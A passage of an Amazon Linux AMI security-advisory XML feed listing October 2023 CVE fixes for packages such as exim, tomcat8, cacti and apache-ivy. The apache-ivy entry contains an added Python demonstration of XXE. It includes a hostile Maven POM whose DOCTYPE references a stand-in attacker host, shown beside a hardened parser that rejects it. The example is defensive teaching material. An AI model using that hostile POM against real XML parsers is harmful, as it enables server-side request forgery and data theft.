</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4504" title="" id="CVE-2023-4504" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cups-lpd" version="1.4.2" release="67.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-lpd-1.4.2-67.25.amzn1.x86_64.rpm</filename></package><package name="cups" version="1.4.2" release="67.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-1.4.2-67.25.amzn1.x86_64.rpm</filename></package><package name="cups-libs" version="1.4.2" release="67.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-libs-1.4.2-67.25.amzn1.x86_64.rpm</filename></package><package name="cups-php" version="1.4.2" release="67.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-php-1.4.2-67.25.amzn1.x86_64.rpm</filename></package><package name="cups-debuginfo" version="1.4.2" release="67.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-debuginfo-1.4.2-67.25.amzn1.x86_64.rpm</filename></package><package name="cups-devel" version="1.4.2" release="67.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-devel-1.4.2-67.25.amzn1.x86_64.rpm</filename></package><package name="cups-devel" version="1.4.2" release="67.25.amzn1" epoch="1" arch="i686"><filename>Packages/cups-devel-1.4.2-67.25.amzn1.i686.rpm</filename></package><package name="cups-php" version="1.4.2" release="67.25.amzn1" epoch="1" arch="i686"><filename>Packages/cups-php-1.4.2-67.25.amzn1.i686.rpm</filename></package><package name="cups-lpd" version="1.4.2" release="67.25.amzn1" epoch="1" arch="i686"><filename>Packages/cups-lpd-1.4.2-67.25.amzn1.i686.rpm</filename></package><package name="cups" version="1.4.2" release="67.25.amzn1" epoch="1" arch="i686"><filename>Packages/cups-1.4.2-67.25.amzn1.i686.rpm</filename></package><package name="cups-libs" version="1.4.2" release="67.25.amzn1" epoch="1" 
arch="i686"><filename>Packages/cups-libs-1.4.2-67.25.amzn1.i686.rpm</filename></package><package name="cups-debuginfo" version="1.4.2" release="67.25.amzn1" epoch="1" arch="i686"><filename>Packages/cups-debuginfo-1.4.2-67.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1858</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1858: medium priority package update for nss-softokn</title><issued date="2023-10-12 15:48:00" /><updated date="2023-10-24 21:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-4421:
New tlsfuzzer code can still detect timing issues in RSA operations.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4421" title="" id="CVE-2023-4421" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-softokn" version="3.53.1" release="6.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-3.53.1-6.48.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-devel" version="3.53.1" release="6.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-devel-3.53.1-6.48.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.53.1" release="6.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-freebl-devel-3.53.1-6.48.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-debuginfo" version="3.53.1" release="6.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-debuginfo-3.53.1-6.48.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl" version="3.53.1" release="6.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-freebl-3.53.1-6.48.amzn1.x86_64.rpm</filename></package><package name="nss-softokn" version="3.53.1" release="6.48.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-3.53.1-6.48.amzn1.i686.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.53.1" release="6.48.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-freebl-devel-3.53.1-6.48.amzn1.i686.rpm</filename></package><package name="nss-softokn-debuginfo" version="3.53.1" release="6.48.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-debuginfo-3.53.1-6.48.amzn1.i686.rpm</filename></package><package name="nss-softokn-devel" version="3.53.1" release="6.48.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-devel-3.53.1-6.48.amzn1.i686.rpm</filename></package><package name="nss-softokn-freebl" version="3.53.1" release="6.48.amzn1" epoch="0" 
arch="i686"><filename>Packages/nss-softokn-freebl-3.53.1-6.48.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1859</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1859: medium priority package update for libX11</title><issued date="2023-10-12 15:48:00" /><updated date="2023-10-24 21:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-43787:
libX11: integer overflow in XCreateImage() leading to a heap overflow.
CVE-2023-43785:
libX11: out-of-bounds memory access in _XkbReadKeySyms()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43785" title="" id="CVE-2023-43785" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43787" title="" id="CVE-2023-43787" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libX11-debuginfo" version="1.6.0" release="2.2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-debuginfo-1.6.0-2.2.16.amzn1.x86_64.rpm</filename></package><package name="libX11-common" version="1.6.0" release="2.2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-common-1.6.0-2.2.16.amzn1.x86_64.rpm</filename></package><package name="libX11-devel" version="1.6.0" release="2.2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-devel-1.6.0-2.2.16.amzn1.x86_64.rpm</filename></package><package name="libX11" version="1.6.0" release="2.2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-1.6.0-2.2.16.amzn1.x86_64.rpm</filename></package><package name="libX11-devel" version="1.6.0" release="2.2.16.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-devel-1.6.0-2.2.16.amzn1.i686.rpm</filename></package><package name="libX11-common" version="1.6.0" release="2.2.16.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-common-1.6.0-2.2.16.amzn1.i686.rpm</filename></package><package name="libX11" version="1.6.0" release="2.2.16.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-1.6.0-2.2.16.amzn1.i686.rpm</filename></package><package name="libX11-debuginfo" version="1.6.0" release="2.2.16.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-debuginfo-1.6.0-2.2.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1860</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1860: important priority package update for 
exim</title><issued date="2023-10-12 15:48:00" /><updated date="2023-10-24 21:38:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-42117:
Exim Improper Neutralization of Special Elements Remote Code Execution Vulnerability
NOTE: https://www.zerodayinitiative.com/advisories/ZDI-23-1471/
CVE-2023-42116:
Exim SMTP Challenge Stack-based Buffer Overflow Remote Code Execution Vulnerability
NOTE: https://www.zerodayinitiative.com/advisories/ZDI-23-1470/
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-42116" title="" id="CVE-2023-42116" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-42117" title="" id="CVE-2023-42117" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim" version="4.92" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.92-1.39.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.92" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.92-1.39.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.92-1.39.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.92-1.39.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.92-1.39.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.92-1.39.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.92-1.39.amzn1.i686.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/exim-debuginfo-4.92-1.39.amzn1.i686.rpm</filename></package><package name="exim-mon" version="4.92" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mon-4.92-1.39.amzn1.i686.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.92-1.39.amzn1.i686.rpm</filename></package><package 
name="exim-greylist" version="4.92" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.92-1.39.amzn1.i686.rpm</filename></package><package name="exim" version="4.92" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.92-1.39.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1861</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1861: important priority package update for tomcat8</title><issued date="2023-10-12 15:48:00" /><updated date="2023-10-24 21:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-41080:
URL Redirection to Untrusted Site ('Open Redirect') vulnerability in the FORM authentication feature of Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.0.12, from 9.0.0-M1 through 9.0.79 and from 8.5.0 through 8.5.92.
The vulnerability is limited to the ROOT (default) web application.
CVE-2023-24998:
Apache Commons FileUpload before 1.5 does not limit the number of request parts to be processed resulting in the possibility of an attacker triggering a DoS with a malicious upload or series of uploads. Note that, like all of the file upload limits, the new configuration option (FileUploadBase#setFileCountMax) is not enabled by default and must be explicitly configured.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24998" title="" id="CVE-2023-24998" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41080" title="" id="CVE-2023-41080" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-admin-webapps" version="8.5.93" release="1.94.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.93-1.94.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.93" release="1.94.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.93-1.94.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.93" release="1.94.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.93-1.94.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.93" release="1.94.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.93-1.94.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.93" release="1.94.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.93-1.94.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.93" release="1.94.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.93-1.94.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.93" release="1.94.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.93-1.94.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.93" release="1.94.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.93-1.94.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.93" release="1.94.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.93-1.94.amzn1.noarch.rpm</filename></package><package 
name="tomcat8-el-3.0-api" version="8.5.93" release="1.94.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.93-1.94.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1862</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1862: important priority package update for cacti</title><issued date="2023-10-12 15:48:00" /><updated date="2023-10-24 21:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-39364:
Cacti is an open source operational monitoring and fault management framework. In Cacti 1.2.24, users with console access can be redirected to an arbitrary website after a change password performed via a specifically crafted URL. The `auth_changepassword.php` file accepts `ref` as a URL parameter and reflects it in the form used to perform the change password. Its value is used to perform a redirect via the `header` PHP function. A user can be tricked into performing the change password operation, e.g., via a phishing message, and then interacting with the malicious website where the redirection has been performed, e.g., downloading malware, providing credentials, etc. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.
CVE-2023-39362:
Cacti is an open source operational monitoring and fault management framework. In Cacti 1.2.24, under certain conditions, an authenticated privileged user can use a malicious string in the SNMP options of a Device, performing command injection and obtaining remote code execution on the underlying server. The `lib/snmp.php` file has a set of functions, with similar behavior, that accept some variables as input and place them into an `exec` call without proper escaping or validation. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39362" title="" id="CVE-2023-39362" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39364" title="" id="CVE-2023-39364" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cacti" version="1.1.19" release="5.23.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-1.1.19-5.23.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1863</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1863: important priority package update for apache-ivy</title><issued date="2023-10-12 15:48:00" /><updated date="2023-10-24 21:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-46751:
Improper Restriction of XML External Entity Reference, XML Injection (aka Blind XPath Injection) vulnerability in Apache Software Foundation Apache Ivy. This issue affects any version of Apache Ivy prior to 2.5.2.
When Apache Ivy prior to 2.5.2 parses XML files - either its own configuration, Ivy files or Apache Maven POMs - it will allow downloading external document type definitions and expand any entity references contained therein when used.
This can be used to exfiltrate data, access resources only the machine running Ivy has access to or disturb the execution of Ivy in different ways.
Starting with Ivy 2.5.2, DTD processing is disabled by default except when parsing Maven POMs, where the default is to allow DTD processing but only to include a DTD snippet shipping with Ivy that is needed to deal with existing Maven POMs that are not valid XML files but are nevertheless accepted by Maven. Access can be made more lenient via newly introduced system properties where needed.
Users of Ivy prior to version 2.5.2 can use Java system properties to restrict processing of external DTDs, see the section about "JAXP Properties for External Access restrictions" inside Oracle's "Java API for XML Processing (JAXP) Security Guide".
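The two parser behaviours the advisory contrasts, as an added Python example rather than Ivy's own (Java) code: a lenient parser that resolves the external DTD a hostile POM points at, beside a strict parser that refuses any DOCTYPE before the parser can act on it. The POM snippets and the `attacker.invalid` host are constructed for this example. In Java the equivalent hardening is the JAXP `javax.xml.accessExternalDTD` system property set to an empty string, which is what the last paragraph refers to.
<![CDATA[
```python
import xml.parsers.expat as expat

# Constructed stand-ins for a Maven POM Ivy would parse: one whose DOCTYPE points at an
# attacker-controlled DTD, and one without a DOCTYPE at all.
HOSTILE_POM = b"""<?xml version="1.0"?>
<!DOCTYPE project SYSTEM "http://attacker.invalid/evil.dtd">
<project><modelVersion>4.0.0</modelVersion><artifactId>demo</artifactId></project>
"""
CLEAN_POM = b"""<?xml version="1.0"?>
<project><modelVersion>4.0.0</modelVersion><artifactId>demo</artifactId></project>
"""


class UnsafeDoctype(ValueError):
    """Raised by strict_parse when a document carries a DOCTYPE."""


def lenient_parse(data: bytes) -> list:
    """Pre-2.5.2 behaviour in miniature: external DTD references are resolved. Returns the
    system ids the parser asked to fetch, which is the SSRF and exfiltration channel the
    advisory describes (a real resolver would open each URL and expand what it found)."""
    fetched = []
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)

    def on_external_entity(context, base, system_id, public_id):
        fetched.append(system_id)   # this is where the network request would happen
        return 1                    # non-zero: carry on without the entity's content

    parser.ExternalEntityRefHandler = on_external_entity
    parser.Parse(data, True)
    return fetched


def strict_parse(data: bytes) -> str:
    """Hardened: any DOCTYPE is refused as soon as it is seen, so neither an external subset
    nor an internal entity definition is ever processed. Returns the root element name."""
    root = []
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise UnsafeDoctype(f"DOCTYPE refused: name={name!r} system id={system_id!r}")

    def on_start_element(name, attrs):
        if not root:
            root.append(name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start_element
    parser.Parse(data, True)
    return root[0]


if __name__ == "__main__":
    print("lenient parser would fetch:", lenient_parse(HOSTILE_POM))
    print("strict parser root:", strict_parse(CLEAN_POM))
    try:
        strict_parse(HOSTILE_POM)
    except UnsafeDoctype as exc:
        print("strict parser:", exc)
```
]]>
Refusing the DOCTYPE outright is the safe default for build metadata you fetch from third parties; Ivy's 2.5.2 compromise of allowing only a bundled DTD snippet for POMs exists because some published POMs are not well-formed XML without it.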
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46751" title="" id="CVE-2022-46751" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="apache-ivy-javadoc" version="2.2.0" release="5.2.amzn1" epoch="0" arch="noarch"><filename>Packages/apache-ivy-javadoc-2.2.0-5.2.amzn1.noarch.rpm</filename></package><package name="apache-ivy" version="2.2.0" release="5.2.amzn1" epoch="0" arch="noarch"><filename>Packages/apache-ivy-2.2.0-5.2.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1864</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1864: important priority package update for java-1.8.0-openjdk</title><issued date="2023-10-12 15:48:00" /><updated date="2023-10-24 21:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-40433:
An issue was discovered in function ciMethodBlocks::make_block_at in Oracle JDK (HotSpot VM) 11, 17 and OpenJDK (HotSpot VM) 8, 11, 17, allows attackers to cause a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40433" title="" id="CVE-2022-40433" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.382.b05" release="1.79.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.382.b05-1.79.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.382.b05" release="1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.382.b05-1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.382.b05" release="1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.382.b05-1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.382.b05" release="1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.382.b05-1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.382.b05" release="1.79.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.382.b05-1.79.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.382.b05" release="1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.382.b05" release="1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.382.b05-1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.382.b05" release="1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.382.b05-1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.382.b05" 
release="1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.382.b05-1.79.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.382.b05" release="1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.79.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.382.b05" release="1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.382.b05-1.79.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.382.b05" release="1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.382.b05-1.79.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.382.b05" release="1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.382.b05-1.79.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.382.b05" release="1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.382.b05-1.79.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1865</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1865: medium priority package update for mutt</title><issued date="2023-10-12 15:48:00" /><updated date="2023-10-24 21:37:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-1328:
A flaw was found in mutt. When reading unencoded messages, mutt uses the line length from the untrusted input without any validation. This flaw allows an attacker to craft a malicious message, which leads to an out-of-bounds read, causing data leaks that include fragments of other unrelated messages.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1328" title="" id="CVE-2022-1328" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mutt-debuginfo" version="1.5.20" release="7.20091214hg736b6a.11.amzn1" epoch="5" arch="x86_64"><filename>Packages/mutt-debuginfo-1.5.20-7.20091214hg736b6a.11.amzn1.x86_64.rpm</filename></package><package name="mutt" version="1.5.20" release="7.20091214hg736b6a.11.amzn1" epoch="5" arch="x86_64"><filename>Packages/mutt-1.5.20-7.20091214hg736b6a.11.amzn1.x86_64.rpm</filename></package><package name="mutt-debuginfo" version="1.5.20" release="7.20091214hg736b6a.11.amzn1" epoch="5" arch="i686"><filename>Packages/mutt-debuginfo-1.5.20-7.20091214hg736b6a.11.amzn1.i686.rpm</filename></package><package name="mutt" version="1.5.20" release="7.20091214hg736b6a.11.amzn1" epoch="5" arch="i686"><filename>Packages/mutt-1.5.20-7.20091214hg736b6a.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1866</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1866: important priority package update for amazon-ssm-agent</title><issued date="2023-10-12 15:48:00" /><updated date="2023-10-30 23:31:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-24540:
html/template: improper handling of JavaScript whitespace.
Not all valid JavaScript whitespace characters were considered to be whitespace. Templates containing whitespace characters outside of the character set "\t\n\f\r\u0020\u2028\u2029" in JavaScript contexts that also contain actions may not be properly sanitized during execution.
CVE-2023-24538:
Templates did not properly consider backticks (`) as JavaScript string delimiters, and as such did not escape them as expected. Backticks are used, since ES6, for JS template literals. If a template contained a Go template action within a JavaScript template literal, the contents of the action could be used to terminate the literal, injecting arbitrary JavaScript code into the Go template.
CVE-2022-41723:
http2/hpack: avoid quadratic complexity in hpack decoding. A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.
CVE-2021-43565:
The x/crypto/ssh package before 0.0.0-20211202192323-5770296d904e of golang.org/x/crypto allows an attacker to panic an SSH server.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43565" title="" id="CVE-2021-43565" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723" title="" id="CVE-2022-41723" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24538" title="" id="CVE-2023-24538" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24540" title="" id="CVE-2023-24540" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="amazon-ssm-agent-debuginfo" version="3.2.1705.0" release="1.amzn1" epoch="0" arch="x86_64"><filename>Packages/amazon-ssm-agent-debuginfo-3.2.1705.0-1.amzn1.x86_64.rpm</filename></package><package name="amazon-ssm-agent" version="3.2.1705.0" release="1.amzn1" epoch="0" arch="x86_64"><filename>Packages/amazon-ssm-agent-3.2.1705.0-1.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1867</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1867: medium priority package update for ghostscript</title><issued date="2023-10-12 15:48:00" /><updated date="2023-10-24 21:37:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-16294:
A buffer overflow vulnerability in epsc_print_page() in devices/gdevepsc.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16294" title="" id="CVE-2020-16294" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ghostscript" version="8.70" release="24.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-8.70-24.33.amzn1.x86_64.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-devel-8.70-24.33.amzn1.x86_64.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-doc-8.70-24.33.amzn1.x86_64.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-debuginfo-8.70-24.33.amzn1.x86_64.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.33.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-devel-8.70-24.33.amzn1.i686.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.33.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-debuginfo-8.70-24.33.amzn1.i686.rpm</filename></package><package name="ghostscript" version="8.70" release="24.33.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-8.70-24.33.amzn1.i686.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.33.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-doc-8.70-24.33.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1868</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1868: important priority package update for tomcat8</title><issued date="2023-10-16 13:45:00" /><updated date="2023-10-18 20:10:00" 
/><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-45648:
